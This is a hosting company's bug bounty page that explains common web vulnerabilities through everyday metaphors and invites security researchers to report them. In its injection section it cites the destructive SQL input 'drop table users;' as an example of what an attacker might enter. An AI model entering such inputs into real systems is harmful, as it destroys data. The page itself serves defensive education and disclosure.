Earn Recognition & Free Hosting
Passionate about security? Join our open bounty program & report vulnerabilities (CSRF, XSS, SQLi)! We value your contribution & offer public recognition, free hosting, & a chance to make a real impact. Ethical hackers & security researchers welcome!

Overview of Vulnerabilities Open Bounty

At WebHostingM, we take security seriously and rely on the expertise of security researchers like you to help us identify and address vulnerabilities. This page outlines the key types of vulnerabilities we actively encourage you to report through our bounty program.


TLDR

Protecting Your Identity and Access:

  • Authentication Vulnerabilities: Weak login systems can give attackers access to user accounts, potentially compromising sensitive data. Report any issues with login processes, password resets, or two-factor authentication.
  • Cross-Site Scripting (XSS): Malicious code injected into websites can steal user information or perform unauthorized actions. Report any suspicious behavior or unexpected scripts on our platform.
  • Cross-Site Request Forgery (CSRF): Attackers can exploit website mechanics to trick users into performing harmful actions. Report any forms or functionalities that seem vulnerable to unauthorized requests.

Securing Your Information:

  • Sensitive Data Exposure: Unprotected personal information like passwords or credit card details attracts attackers. Report any instances where sensitive data might be stored or transmitted unencrypted or without proper access controls.
  • File Upload Vulnerabilities: Malicious files uploaded to our platform can harm users or the system. Report any issues with file types allowed, upload processes, or potential for data exfiltration through uploaded files.
  • Insecure Direct Object References (IDOR): Improper access controls can allow attackers to access resources they shouldn't, like other users' data. Report any vulnerabilities where manipulating URLs or identifiers grants unauthorized access.

Maintaining System Integrity:

  • Access Control Vulnerabilities: Users should only have access to features and data they're authorized for. Report any instances where users can bypass access controls or perform actions outside their intended permissions.
  • Security Misconfigurations: Incorrectly configured software or systems can create security gaps. Report any misconfigurations in server settings, applications, or other components that could be exploited.
  • Server-Side Request Forgery (SSRF): Attackers can manipulate internal requests to access sensitive data or launch internal attacks. Report any vulnerabilities that allow unauthorized manipulation of server-side requests.

Beyond the List:

Remember, this list is not exhaustive. We encourage you to think creatively and report any vulnerabilities that could impact the security of our platform and user data. We appreciate your contribution to building a safer online environment for everyone!


1. Injection

Imagine your website has a door with a "welcome" mat. Anyone can walk through the door and step on the mat, right?


Now imagine that mat can run instructions! If someone wrote malicious instructions on the mat instead of "Welcome," and the door didn't check what was written, those instructions could be activated when someone steps on it. This is what happens in an "injection attack."


Attackers try to sneak harmful code into our website through forms, comments, or other areas where users input information. If we don't check this code carefully, it can trick our website into doing bad things, like stealing data or messing things up.


That's why we have a bounty program! We reward people who help us find these "mat instructions" before they cause trouble. By working together, we can keep our website safe for everyone.


Here are some simple examples of "mat instructions":


  • Entering "drop table users;" in a username field could delete all user accounts.
  • Adding a special code to a comment could give someone control of the website.
  • Putting harmful instructions in a form could steal your information.
Remember, even if you don't understand code, you can still help! If you see anything suspicious on our website, please report it. Together, we can keep the bad guys out!

2. Authentication Vulnerabilities

Imagine your front door has a simple lock. Anyone could try common keys or guess the combination to get in, right? That's similar to a website with weak authentication. Hackers can use stolen passwords or automated tools to try millions of combinations until they find one that works.


Now imagine your door has a deadbolt, a security camera, and even an alarm! That's like our website with strong authentication. We use multiple layers of protection, like two-factor authentication (like a second lock) and session limits (like a timer on the security alarm).


Developers frequently build custom authentication and session management schemes, but building these correctly is hard. As a result, these custom schemes frequently have flaws in logout, password management, timeouts, remember me, secret questions, account updates, etc. Finding such flaws can sometimes be difficult, as each implementation is unique.


This weak authentication can lead to big problems:


  • Hackers stealing your account: They can access your information, change your settings, or even impersonate you.
  • Hackers taking over the whole system: They might gain admin access and cause major damage.

We take authentication seriously and try to mitigate this vulnerability with:


  • Multiple authentication methods: Not just passwords, but also tokens and second-factor options.
  • Regular security checks: We constantly look for and fix weak spots.
  • Limited sessions: Even if someone gets in, their access doesn't last forever.
  • Advanced protection: We use special tools to block suspicious activity.

But we are more than aware that security is a team effort!


To our customers, partners, and visitors:


  • Use strong passwords and different ones for each website.
  • Enable two-factor authentication whenever possible.
  • Report any suspicious activity you see.

By working together, we can keep our online world safe and secure!


More about authentication and session management vulnerabilities from OWASP's Top 10:


3. Sensitive Data Exposure

These vulnerabilities occur when attackers can exploit weaknesses in login systems, potentially gaining access to user accounts or even admin privileges. Imagine someone trying every key on your door - that's what brute-force attacks aim for. By reporting these vulnerabilities, you help us build stronger authentication walls and keep bad actors out.


Sensitive Data Exposure:


Think of sensitive data as precious jewels kept in a treasure chest. These vulnerabilities arise when information like passwords, credit card numbers, or session tokens aren't adequately protected. Hackers might use "peeking" techniques to steal these jewels, causing financial harm or identity theft. Your reports help us build stronger chests, encrypt data and partner with trusted guards (payment processors) to keep your information safe.


How do we keep customers' information safe?


  • High-tech lock: We encrypt all your sensitive data, making it scrambled and unreadable to anyone but us. It's like adding a super-strong lock to your treasure chest!
  • No peeking allowed: We never store sensitive information like passwords or credit card details on our systems. It's like leaving the chest empty, so even if someone breaks in, they find nothing valuable.
  • Third-party guards: For payments, we partner with secure payment processors, like having trusted guards protect your chest instead of keeping it at home.
  • No forgetting the key: We don't store temporary security codes after they're used, like throwing away the key after opening the chest.

Remember, security is a team effort. Join our bounty program and help us identify these vulnerabilities before they cause trouble. Together, we can create a fortress for your data and online experiences.


More about sensitive data exposure vulnerabilities from OWASP's Top 10:


4. XML External Entity (XEE) Attacks

Ever heard of "looking the other way" while someone sneaks in? That's kind of what happens in an XEE attack on a website. Attackers exploit weaknesses in how websites handle specific data (XML) to steal sensitive information.


Picture this: You use a special lockbox to store important things. An XEE attack is like tricking the lockbox into opening and sending its contents to the wrong person!


How do we stop these sneaky attacks?


  • Upgrading our defenses: We constantly update our systems and tools to stay ahead of evolving threats. It's like patching up any cracks in the lockbox.
  • Double-checking entries: We have security systems in place to monitor and block suspicious activity, like watching out for anyone trying to unlock the box the wrong way.
  • Saying no to outdated tech: Just like older locks become easier to pick, we're moving away from using XML in parts of our systems where it's less secure.

Join our security squad!


By reporting potential XEE vulnerabilities, you help us build even stronger defenses. Remember, security is a team effort!


XML or Extensible Markup Language is a markup language intended to be both human-readable and machine-readable. Due to its complexity and security vulnerabilities, it is now being phased out of use in many web applications.

5. Broken Access Control

Imagine a castle with different levels of access: guests in the courtyard, knights in the training yard, and the king in his chambers. Access control is like the guards at each gate, making sure only authorized people reach the right places.


Broken access control vulnerabilities are like sneaky intruders slipping past the guards. In a website, this could mean attackers gaining access to areas they shouldn't, like seeing other users' info or messing with settings.


How do we keep our "castle" secure?


  • Clear rules for everyone: We define strict limits on what each user can do, like assigning different permissions to different roles.
  • Double-checking identities: Every action requiring more access requires extra verification, like asking for a special token instead of just a password.
  • Guarding sensitive areas: We have extra security measures for critical information, like keeping the king's chambers heavily guarded.

Join our security team!


By reporting potential access control vulnerabilities, you help us strengthen our digital castle walls and keep everyone's information safe. Remember, security is a shared responsibility!


6. Security Misconfigurations

Imagine building a house out of LEGOs. If you miss a piece or put one in the wrong place, the whole structure gets shaky, right? The same goes for websites and apps. Security misconfigurations are like missing or misplaced LEGOs, leaving gaps that attackers can exploit.


What are security misconfigurations?


It's when settings on different parts of a website (like the server, database, or code) aren't set up securely. Think of it as forgetting to lock your doors or leaving windows open on your LEGO house. Hackers can then sneak in and cause trouble.


How do we build secure systems?


  • Pre-built security fortress: We use special "hardened" operating systems and tools that are already configured securely, like having a pre-built LEGO house with strong walls and locks.
  • Automation magic: We use special tools to automatically check for any security gaps, like having a robot housekeeper looking for unlocked doors and windows.
  • Consistent building blocks: All our environments, from testing to production, are built the same way with different keys (passwords), so there are no weak spots.

By reporting potential misconfigurations, you help us make our digital house even stronger. Remember, even small things can make a big difference!


More about security misconfigurations vulnerabilities from OWASP's Top 10


7. Cross-Site Scripting (XSS)

Imagine someone sneaking hidden instructions into a recipe you share online. That's what happens in an XSS attack! Attackers trick websites into accepting malicious code disguised as normal content, potentially harming website visitors.


What is XSS?


It's a sneaky way attackers inject harmful code into websites, like hiding instructions in a shared recipe. When someone visits the site, the code runs in their browser, potentially stealing information or causing damage.


How do we keep your recipes safe?


  • Security guards: We use special tools (Content-Security Policy) to act like security guards, checking every ingredient (code) that goes into the recipe. Only approved ingredients are allowed!
  • Extra caution: We have additional safety measures (X-XSS-Protection) that act like double-checking ingredients for hidden surprises.
  • Protecting your cookies: We treat sensitive information like cookies (secret recipe notes) extra carefully, making them harder to steal.

Join our security kitchen!


By reporting potential XSS vulnerabilities, you help us keep everyone's online recipes safe. Remember, even small details can make a big difference!


8. Cross-Site Request Forgery (CSRF)

Imagine someone tricking you into clicking a hidden button on your phone that sends unauthorized texts from your number. That's kind of what happens in a CSRF attack! Attackers exploit how websites handle your logged-in state to make you unknowingly perform actions you didn't intend.


What is CSRF?


It's like someone hiding a sneaky button on your phone. When you visit a malicious website, it triggers that button without your knowledge, using your logged-in state to do things like changing your password or buying something in your name.


How do we keep your clicks safe?


  • Unique security code: We use a special secret code on each request, like a password for your phone's buttons. Attackers can't guess it, so they can't hijack your clicks.
  • Be vigilant! If you see suspicious forms on our website (login, contact, etc.), where someone might try to hide a "click button," please report it!

By reporting potential CSRF vulnerabilities, you help us make your online experience safer and more secure. Remember, even small details can make a big difference!


9. File Upload

Imagine someone sending you a delicious-looking cake, but you're not sure what's inside. That's kind of how file uploads can work on websites. We want to make sure only safe treats get through!


What are file upload vulnerabilities?


It's when attackers can upload malicious files disguised as harmless ones, potentially harming the website and its users. Think of someone putting a hidden "explosive filling" in the cake!


How do we keep everyone safe?


  • Security checkups: We have a list of approved file types, like checking ingredients before baking. Only safe ones make it through!
  • X-ray vision: We use special tools to scan uploaded files for hidden surprises, like checking for explosives in the cake.
  • Limited portions: We prevent attackers from sending giant files that could overwhelm our servers, like stopping someone from sending a cake the size of a house!
  • No secret messages: We make sure uploaded files can't be used to trick users or harm others, like ensuring the cake doesn't contain hidden messages.

By reporting potential file upload vulnerabilities, you help us keep the digital cake fresh and safe for everyone. Remember, even small details can make a big difference!


10. Insecure File Permissions

Imagine leaving your house keys accessible to anyone on the street. That's what happens with insecure file permissions! Attackers can exploit misconfigured access controls to access sensitive files, potentially stealing customer data, messing with system settings, or launching further attacks.


How do we keep your files safe?


  • Locked doors: We assign proper access rights to files, like giving keys only to authorized personnel.
  • Regular security checks: We constantly scan and review file permissions to ensure they're locked tight.
  • Limited access: We restrict access to critical files further, adding extra security measures like requiring special codes.

By reporting potential insecure file permissions vulnerabilities, you help us build even stronger digital vaults for your data. Remember, security is a team effort!


11. Phishing Attacks

Imagine receiving a message that appears to be from your bank, asking for your password. Phishing attacks try to trick you into revealing sensitive information. If successful, attackers can steal your login credentials, financial details, or even take control of your accounts.


How do we keep your information safe?


  • Security filters: We have advanced systems to detect and block suspicious phishing emails and websites.
  • User education: We regularly educate our users about phishing tactics and how to identify them.
  • Double-checking: We encourage users to be cautious and verify the sender's identity before clicking on links or entering information.

By reporting potential phishing vulnerabilities, you help us develop even stronger defenses against these sneaky attacks. Remember, vigilance is key to staying safe online!


12. Other Vulnerabilities

We know there's more to security than just ticking a list of boxes. That's why we reward creative thinking when it comes to finding vulnerabilities! Even if it's not explicitly mentioned, if you discover a bug that:


  • Grants users more power than they should have (privilege escalationt)
  • Makes things behave strangely, potentially affecting user data (unexpected behavior)
  • Puts user information at risk (integrity or confidentiality impact)

...then we want to hear about it!


We understand we can't offer the biggest payouts, but we deeply value the contribution of every security researcher who helps us build a stronger platform. Your skills and dedication truly deserve a tip of the hat!

Found something offbeat? Don't hesitate to share it!

File a bug report

Live Chat
Chat with one of our representatives in real-time.
Send Email
Contact us for bespoke solution or technical guidance.
Knowledge base
Read our FAQs, and/or technical guides or get direct support.